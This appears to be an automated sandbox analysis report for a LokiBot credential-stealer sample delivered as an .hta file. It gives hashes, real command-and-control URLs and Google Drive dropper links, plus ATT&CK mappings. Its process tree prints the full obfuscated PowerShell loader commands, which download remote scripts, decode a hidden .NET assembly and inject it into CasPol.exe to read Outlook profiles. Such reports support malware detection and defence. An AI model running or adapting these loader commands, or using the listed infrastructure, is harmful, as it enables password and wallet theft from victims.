lokibot | 809e92422295976379070a5f2bb56313ca401b52d78b5d78134a08fcfd781202

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-10-2024 12:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
Size

131KB
MD5

07a93908c3113536577c9c5b734a0af0
SHA1

794af14ec431e796ca6b61ed2094f623b86d77a9
SHA256

809e92422295976379070a5f2bb56313ca401b52d78b5d78134a08fcfd781202
SHA512

34ef8170d518afbf42bc16a0759f3609153338e6e4bbc1ce05e94933e13ce4f6c1c8f5de7aedfe5f675311f593d5cbe377908815922d55a076eaa7c35493ba79
SSDEEP

96:4vCt72QeBoCn7iY1opReQiY7ERPI/T5eodWQ:4vCF2QeaCmsoMY7MnAWQ

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

http://94.156.177.220/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
Blocklisted process makes network request 4 IoCs

Processes:

PoWerShELL.eXEpowershell.exe

flow pid process

22 64 PoWerShELL.eXE
25 1644 powershell.exe
29 1644 powershell.exe
35 1644 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4212 powershell.exe
1644 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

PoWerShELL.eXEpowershell.exe

pid process

64 PoWerShELL.eXE
2424 powershell.exe

flow	pid	process
22	64	PoWerShELL.eXE
25	1644	powershell.exe
29	1644	powershell.exe
35	1644	powershell.exe

pid	process
4212	powershell.exe
1644	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

CasPol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	CasPol.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	CasPol.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	CasPol.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

24 drive.google.com
25 drive.google.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1644 set thread context of 928 1644 powershell.exe CasPol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
24	drive.google.com
25	drive.google.com

description	pid	process	target process
PID 1644 set thread context of 928	1644	powershell.exe	CasPol.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.execsc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exePoWerShELL.eXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWerShELL.eXE

Modifies registry class 1 IoCs

Processes:

PoWerShELL.eXE

description ioc process

Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings PoWerShELL.eXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	PoWerShELL.eXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

PoWerShELL.eXEpowershell.exepowershell.exepowershell.exe

pid	process
64	PoWerShELL.eXE
64	PoWerShELL.eXE
2424	powershell.exe
2424	powershell.exe
4212	powershell.exe
4212	powershell.exe
1644	powershell.exe
1644	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

PoWerShELL.eXEpowershell.exepowershell.exepowershell.exeCasPol.exe

description	pid	process
Token: SeDebugPrivilege	64	PoWerShELL.eXE
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	928	CasPol.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

mshta.exePoWerShELL.eXEcsc.exeWScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3628 wrote to memory of 64	3628	mshta.exe	PoWerShELL.eXE
PID 3628 wrote to memory of 64	3628	mshta.exe	PoWerShELL.eXE
PID 3628 wrote to memory of 64	3628	mshta.exe	PoWerShELL.eXE
PID 64 wrote to memory of 2424	64	PoWerShELL.eXE	powershell.exe
PID 64 wrote to memory of 2424	64	PoWerShELL.eXE	powershell.exe
PID 64 wrote to memory of 2424	64	PoWerShELL.eXE	powershell.exe
PID 64 wrote to memory of 1956	64	PoWerShELL.eXE	csc.exe
PID 64 wrote to memory of 1956	64	PoWerShELL.eXE	csc.exe
PID 64 wrote to memory of 1956	64	PoWerShELL.eXE	csc.exe
PID 1956 wrote to memory of 5016	1956	csc.exe	cvtres.exe
PID 1956 wrote to memory of 5016	1956	csc.exe	cvtres.exe
PID 1956 wrote to memory of 5016	1956	csc.exe	cvtres.exe
PID 64 wrote to memory of 4644	64	PoWerShELL.eXE	WScript.exe
PID 64 wrote to memory of 4644	64	PoWerShELL.eXE	WScript.exe
PID 64 wrote to memory of 4644	64	PoWerShELL.eXE	WScript.exe
PID 4644 wrote to memory of 4212	4644	WScript.exe	powershell.exe
PID 4644 wrote to memory of 4212	4644	WScript.exe	powershell.exe
PID 4644 wrote to memory of 4212	4644	WScript.exe	powershell.exe
PID 4212 wrote to memory of 1644	4212	powershell.exe	powershell.exe
PID 4212 wrote to memory of 1644	4212	powershell.exe	powershell.exe
PID 4212 wrote to memory of 1644	4212	powershell.exe	powershell.exe
PID 1644 wrote to memory of 928	1644	powershell.exe	CasPol.exe
PID 1644 wrote to memory of 928	1644	powershell.exe	CasPol.exe
PID 1644 wrote to memory of 928	1644	powershell.exe	CasPol.exe
PID 1644 wrote to memory of 928	1644	powershell.exe	CasPol.exe
PID 1644 wrote to memory of 928	1644	powershell.exe	CasPol.exe
PID 1644 wrote to memory of 928	1644	powershell.exe	CasPol.exe
PID 1644 wrote to memory of 928	1644	powershell.exe	CasPol.exe
PID 1644 wrote to memory of 928	1644	powershell.exe	CasPol.exe
PID 1644 wrote to memory of 928	1644	powershell.exe	CasPol.exe

outlook_office_path 1 IoCs

Processes:

CasPol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	CasPol.exe

outlook_win_path 1 IoCs

Processes:

CasPol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	CasPol.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3628
- C:\Windows\SysWOW64\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE
  "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:64
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5kxv4ctp\5kxv4ctp.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1956
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FAB.tmp" "c:\Users\Admin\AppData\Local\Temp\5kxv4ctp\CSC286D894BB6014015BAEFFC3C875FB32.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5016
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4644
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4212
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1644
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoWerShELL.eXE.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
ad77635f0b61fb1e1624cdf44d078112

SHA1
71d99b1063103b5c99c6231af8f36d0043a6f2df

SHA256
37b6b633c6d3ffabbb9e0cc28231d991a3b4ce6d5c95f684d02b8eb1f0a0235d

SHA512
6b68b081738acb73875a4e9cbaef7b1207e66be0f244d796fdf129f9034206b8594380954af76f4acec28cde447d48696d1f6b241cfcef2ad23e0a8f04cdacfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
256B

MD5
14fcdec931f49f6c2d5f60b5abf7198c

SHA1
8c1b77bf9ba164e0a9e920c20dbfccb0189fb6e7

SHA256
80cef5affee6254326fc56960e9da5d0f0cdabef74cff0356867bd2c10fbd48a

SHA512
c005ad330663d5a2292bdcb68a26c4ddcc2fd48de83d9c13bcffa93dc8b9c304b6652f7e40369609450d06cad952cd6a36ee100b6cb65a759c3c2b552e53889e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
a6c40f1483c5daa0d16c04088890152c

SHA1
7deafead6a9a735cb1b479877e5a7ee731e46573

SHA256
be79c65541fa7f8e605151956f00484127a0b944f7e4bdc052a6a556764f282f

SHA512
a467e044b81cd806143fe73c594eaa8777e987c3faba6dda4b3a1bc61074c059dbed5acf72d8f9ba43003744cedca5b86999792e0d5cb92afebfc752ec40d18c

Download Submit
C:\Users\Admin\AppData\Local\Temp\5kxv4ctp\5kxv4ctp.dll

Filesize
3KB

MD5
389ec446c41bc6cf493ab75469868960

SHA1
bd1317e4d59ad082bda6aa5ea361b07156f5d64c

SHA256
9c4f746a56482e77c5d77afffdec474fe8411cc376f411ce46cdf4796f127b29

SHA512
43834606fc64f6991b5472c6d713119b77c5d43bdc2a027f05ba25cd11c39f016e523a37a42b4307c467198e972ee528407f236d656040149933f9038f894efe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9FAB.tmp

Filesize
1KB

MD5
d2e7a3fbc7e77ff7e4bc43344855c274

SHA1
d9e73f7b6f82d7ed481193752c1fcbd09c8e9153

SHA256
40f7ceb04531f17727db728584a648e77fb3b5d0238eca1a0bf4f2b75b776643

SHA512
470e392cea5159cb1da293829f537f16bcb5991f6b269f08316b745033caf762d7d1956f840355420731cda9f6e42f9951fbcbaa6f61a05c90b8f6e47b178678

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ki1audq0.nr2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS

Filesize
137KB

MD5
bf515f00df29b4be31ac6e43ab05cd88

SHA1
29073164d5fdfd336c332321ebd8c01920438a8b

SHA256
50b9f7f3880e858ac733e7a7fb6b679e699c8bc9553948d04b2c15194b7520dc

SHA512
6ebb327de4fd7dc7d348ec32c7d7cc9d79bd2753fae2e29f7910e27d52091c6765e6ec6c0e982156661e9b80fe223c831cc739956624ef66262adffa1174ada7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5kxv4ctp\5kxv4ctp.0.cs

Filesize
462B

MD5
bf57b8e732d7b6222960bf1d5dd5df18

SHA1
0cda321126a9876c2881199b2940c05492b0d94f

SHA256
f77463e3272af620bc1620c10233f07a3e1c43b77d053a3477a92579b912ccfc

SHA512
9ed1f51736815946772533e380020b0de4c449aaa72db6b2ce29d7eab458216dd8fa9b9333a07164c72290d758412dcbab51099da031ed465ee62f73a14cfabb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5kxv4ctp\5kxv4ctp.cmdline

Filesize
369B

MD5
75ea5a9fa12d59ba2bb7c98ff9d87ad8

SHA1
1a829239d71cab93ee07d206b63f0779a1552ad0

SHA256
98b270ea2a32737c8ae5541d1b3344e7cbb37cdc8b06def641c58781516c3899

SHA512
212fe768928ca06d85d09fc5197a9b485030b8a26bdfb617e05a56ffc760fae8b436bad1017ca2692d7ff16daf2b71c49d7d91fc7c5066cb4e242f517543424f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5kxv4ctp\CSC286D894BB6014015BAEFFC3C875FB32.TMP

Filesize
652B

MD5
ba10fadc33e5ae39983c26f38c24ef4f

SHA1
c2e854513277cb0f7b5a5c54a37b41796c40e798

SHA256
87347527d4b51241e4359c043c89a9be23c2c30d287e6a9a3d35b302ae805a57

SHA512
41bc8763078d018e4aa9cb864eef68652421c599e771dc44210544d62fc2bca1ce588ad9470b841f3ebced1c4552d0998388e991b6cbf4aba5f887f393eaa895

Download Submit
memory/64-4-0x0000000005C30000-0x0000000005C52000-memory.dmp

Filesize
136KB

Download
memory/64-0-0x00000000705DE000-0x00000000705DF000-memory.dmp

Filesize
4KB

Download
memory/64-64-0x0000000006A50000-0x0000000006A58000-memory.dmp

Filesize
32KB

Download
memory/64-70-0x00000000705DE000-0x00000000705DF000-memory.dmp

Filesize
4KB

Download
memory/64-16-0x0000000005FB0000-0x0000000006304000-memory.dmp

Filesize
3.3MB

Download
memory/64-73-0x0000000008A40000-0x0000000008FE4000-memory.dmp

Filesize
5.6MB

Download
memory/64-1-0x0000000004EE0000-0x0000000004F16000-memory.dmp

Filesize
216KB

Download
memory/64-3-0x00000000055C0000-0x0000000005BE8000-memory.dmp

Filesize
6.2MB

Download
memory/64-2-0x00000000705D0000-0x0000000070D80000-memory.dmp

Filesize
7.7MB

Download
memory/64-72-0x00000000705D0000-0x0000000070D80000-memory.dmp

Filesize
7.7MB

Download
memory/64-6-0x0000000005E40000-0x0000000005EA6000-memory.dmp

Filesize
408KB

Download
memory/64-5-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
